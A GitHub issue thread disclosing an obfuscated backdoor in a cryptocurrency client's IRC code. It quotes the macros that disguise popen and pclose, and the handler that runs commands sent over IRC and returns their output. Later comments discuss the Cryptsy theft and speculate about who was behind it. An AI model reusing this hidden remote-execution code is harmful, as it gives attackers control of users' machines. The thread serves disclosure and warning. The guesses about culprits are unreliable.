Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

backdoor in IRC code #1

Open
dooglus opened this issue Mar 8, 2015 · 47 comments

Comments

Projects
None yet
@dooglus
Copy link

commented Mar 8, 2015

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

@n4ru

This comment has been minimized.

Copy link

commented Jan 15, 2016

Too little too late, sadly.

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 15, 2016

First of all, are they retarded and not put each shitcoin in a vm? Second vern probably stole it and is now in China.

No vm and no manual compiling of random shitcoin? Vern cant keep his lies straight. I segregated my own bitpopcoin even when I compiled it myself. DO is only $5/month.

This Trojan is just a story vern found after the fact to facilitate his lies.

@presstab

This comment has been minimized.

Copy link

commented Jan 15, 2016

good find dooglus

@creativecuriosity

This comment has been minimized.

Copy link

commented Jan 15, 2016

Too little too late, sadly.

....

dooglus commented on Mar 8, 2015

@ofeefee

This comment has been minimized.

Copy link

commented Jan 15, 2016

Whoa!

@n4ru

This comment has been minimized.

Copy link

commented Jan 15, 2016

@CreativeCuriousity

That's about a year after the theft took place.

@presstab

This comment has been minimized.

Copy link

commented Jan 15, 2016

First post I can find about this backdoor is from BCT mods https://bitcointalk.org/index.php?topic=935898.0

@saddam213

This comment has been minimized.

Copy link

commented Jan 15, 2016

That's actually quite clever, added this one to my exploit scanner script

Good spotting sir

@zrsmith75

This comment has been minimized.

Copy link

commented Jan 15, 2016

So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result. I mean, seems since a 'newbie' on btctalk with an account one day old would warrant some review at a minimum when dealing with such a serious topic. I feel for all in the crypto community that lost coins due to either greed, fraud or incompetence.

@dooglus

This comment has been minimized.

Copy link
Author

commented Jan 15, 2016

Apparently this is the theft transaction, included In block 313009 (2014-07-29), 8 months before my bug report.

Good spotting sir

I can't take any credit for spotting it. I originally heard of this backdoor in this forum post (January 25, 2015), was curious how the exploit worked, and ended up posting the macro code here so others could more easily understand it, and also to warn others who might fork this codebase.

@sidhujag

This comment has been minimized.

Copy link

commented Jan 15, 2016

Interesting that the coins havent moved? Would be funny if he accidentily sent to an address he didnt own lol

@zrsmith75

This comment has been minimized.

Copy link

commented Jan 15, 2016

HAHA, that would be well deserved @sidhujag ~~ least the scum would not profit and still have an army of crypto fans hunting his head.

@saddam213

This comment has been minimized.

Copy link

commented Jan 15, 2016

Cryptsy never should have had that much in hot wallets, 300k LTC and 16K in hot wallet, ridiculous

So any head hunting should be directed at them IMO

@dooglus

This comment has been minimized.

Copy link
Author

commented Jan 15, 2016

Would be funny if he accidentily sent to an address he didnt own

Actually 11 different addresses that he didn't own...

Who steals 11k BTC and takes the time to split them up into 11 separate addresses in the theft transaction? That is just bizarre.

@zrsmith75

This comment has been minimized.

Copy link

commented Jan 15, 2016

@dooglus so true, could see it happening to one address, but 11 mistakes is highly improbable. I wonder if anyone has went through the LTC blockchain to see if 300k happened the same or near the same time.

@sidhujag

This comment has been minimized.

Copy link

commented Jan 15, 2016

maybe 11 people were involved lol

@StarenseN

This comment has been minimized.

Copy link

commented Jan 15, 2016

dooglus you nailed it. Waw.

@jwg4

This comment has been minimized.

Copy link

commented Jan 15, 2016

Closing this as WONTFIX. This is a feature not a bug people.

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 15, 2016

Correct won't fix, busy on permanent vacation

@doged

This comment has been minimized.

Copy link

commented Jan 15, 2016

@doged

This comment has been minimized.

Copy link

commented Jan 15, 2016

@jwg4 XD

@DanielJoyce

This comment has been minimized.

Copy link

commented Jan 15, 2016

also torcoin on reddit was created around the same time all of these backdoors were landing in various ignored/defunct/marginal cryptocurrencies

@DanielJoyce

This comment has been minimized.

Copy link

commented Jan 15, 2016

Looks all the torcoin accounts went silent after the cyptsy hack was successful.

https://cryptocointalk.com/topic/13084-torcoin-tor-information/

Check the twitter links. Dead since july 2014

@shinohai

This comment has been minimized.

Copy link

commented Jan 15, 2016

^LOL

@Meler-Andy

This comment has been minimized.

Copy link

commented Jan 15, 2016

No way Why always poor people have to loose :( I m so sad now lost plenty of coins from that backdoors now Cryptsy wont give them back :( sad angry and feel like i wanna start being a thief !!!!

@ctrlcctrlv

This comment has been minimized.

Copy link

commented Jan 16, 2016

@BitpopCoin At least segregate coins in different VMs depending on their total value - it's absurd that Vern would run random shitcoin wallet on the same machine as a private key with thousands of BTC. Also, that makes it a hot wallet, not cold storage as Vern claimed.

Cryptsy incompetent since day 1.

@Frankenmint

This comment has been minimized.

Copy link

commented Jan 16, 2016

ITT a shiton of people who come here after the fact when the OP found this nearly a year ago

@dooglus

This comment has been minimized.

Copy link
Author

commented Jan 16, 2016

@ctrlcctrlv We don't know for sure that the lucky7coin and Bitcoin wallets were on the same server. It's possible the lucky7 backdoor was used to gain entry to the 'shitcoin' VM, and from there access was somehow gained to other servers.

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 16, 2016

This thread has no moderators hahaha.

@bolivarcoin

This comment has been minimized.

Copy link

commented Jan 16, 2016

lucky7 still hosted on cryptsy servers, so if really has a backdoor the scammers are very happy that cryptsy havnt de-listed https://www.cryptsy.com/markets/view/LK7_BTC

@dooglus

This comment has been minimized.

Copy link
Author

commented Jan 16, 2016

@Javihache

This comment has been minimized.

Copy link

commented Jan 16, 2016

So TorCoin person/group and Lucky7Coin person/group might be the same... all trying to hit the jackpot with their Backdoor. They hit the Jackpot and disappeared, abandoning their shitcoin projects behind them. So far so good. Now why haven't the BTC Funds been moved? Have the guys been living on the LTC funds this far?

@doged

This comment has been minimized.

Copy link

commented Jan 16, 2016

@dooglus @Javihache paul mentioned on the cryptsy blog that he had alot of "open communication" with special agent shaun bridges, who is now in prison for scamming silk road out of btc.. so if we see those coins move when he gets out, we know who did it.. timeline coincides.

@R32

This comment has been minimized.

Copy link

commented Jan 16, 2016

mark

@ghost

This comment has been minimized.

Copy link

commented Jan 17, 2016

See the good side about it - more prying eyes and people seeing and discussing this, so perhaps they will be able to more easily find deliberate backdoors like that (and perhaps even less so deliberate ones or better hidden ones too).

What strikes me the most is how simple it is in irc.cpp, even non-programmers can almost understand it as-is.

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 17, 2016

Or we can all just concentrate our efforts on Bitcoin and stop shitcoining

@doged

This comment has been minimized.

Copy link

commented Jan 17, 2016

says the guy named after a shitcoin, and has a couple shitcoins in his repo XD

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 17, 2016

Lol that was 2013, the shitcoin phase is done, fuck litecoin and paycoin. Also I abandoned BPC long ago.

@Javihache

This comment has been minimized.

Copy link

commented Jan 17, 2016

Litecoin is cool. Better Conf Times and all, scrypt... I like Litecoin, find it cool to have the "silver" and the "gold". But I still would like to know from you programming guys (I mean real programmers not like me), if there is a way to find out who that alerj78 is and how can be tracked down. Cause through stealing from Cryptsy, he stole from me and many others. And that is not cool.

@doged

This comment has been minimized.

Copy link

commented Jan 17, 2016

@Javihache it was most likely not this coin that is responsible, as i tested this and the way cryptsy is set up, it would not have been possible to steal bitcoins using this backdoor. this daemon would have to have been run as root, and not in its own vm.. so most likely this backdoor is not how cryptsy's bitcoin went missing.

@dooglus

This comment has been minimized.

Copy link
Author

commented Jan 18, 2016

@doged Why do you say the daemon would need to have been run as root? I don't think that is the case.

@doged

This comment has been minimized.

Copy link

commented Jan 18, 2016

@dooglus you're correct, it would have to have been on the same machine as the cold storage bitcoin wallet though, and had permissions.

@jwg4

This comment has been minimized.

Copy link

commented Jan 18, 2016

@doged: Typically a backdoor like this is used to get the first toehold on a target system. Once that has been done, different privilege escalation bugs or attacks to various services can be used to get admin access and/or access to other systems on the target network. This might include traditional software vulnerabilities, or things like searching emails for plaintext passwords, spying on terminal sessions, searching for code repositories or databases for critical data. Unless the system is built to be very robust internally, with security planned on the basis that backdoors like this one will exist, these attempts will usually succeed. People often don't secure their systems from attackers who have partial privileges, and they often don't monitor systems and check logs effectively, which should enable you to find an attacker during this process.
Cryptsy claim that it took several months from the time they installed this code for the attacker to be able to take over their BTC and LTC wallets. This could have been the time taken to go from a single backdoor executing as a non-privileged user on an isolated VM running this coin, to having access to the most secret and valuable information held by Cryptsy.

@pceccato

This comment has been minimized.

Copy link

commented Jan 20, 2016

pardon my ignorance, but why would a crypocoin node require an IRC connection?

@BitpopCoin

This comment has been minimized.

Copy link

commented Jan 20, 2016

To find nodes to connect to

@karel-3d

This comment has been minimized.

Copy link

commented Feb 9, 2016

Even bitcoin has that

@BitpopCoin

This comment has been minimized.

Copy link

commented Feb 9, 2016

No bitcoin stopped that. Also it was never used in that direction.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.